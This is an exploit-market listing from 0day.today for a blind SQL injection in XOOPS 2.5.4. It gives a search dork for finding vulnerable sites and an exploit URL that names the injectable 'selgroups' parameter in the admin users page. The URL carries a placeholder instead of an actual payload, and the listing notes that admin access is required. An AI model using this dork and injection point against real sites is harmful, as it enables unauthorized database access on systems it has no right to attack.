[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xoops 2.5.4 Blind SQL Injection

Author
blkhtc0rp
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17267
Category
web applications
Date add
11-12-2011
Platform
php
------------------------------------------
# Xoops 2.5.4 Blind SQL Injection
------------------------------------------
 
# Dork: "Powered by XOOPS 2.5.4"
# Download: http://sourceforge.net/projects/xoops/
# Date: 10/12/2011
# Author: blkhtc0rp
# Mail: blkhtc0rp[at]yahoo[dot]com
# Tested on: Freebsd 8 and Debian Squeeze
 
 
Note:
 
In order to be successful an attacker must have permission to access the administration menu.
 
Exploit:
 
http://192.168.1.109/xoops-2.5.4/modules/system/admin.php?fct=users&selgroups=[Blind Sqli]



#  0day.today [2024-12-24]  #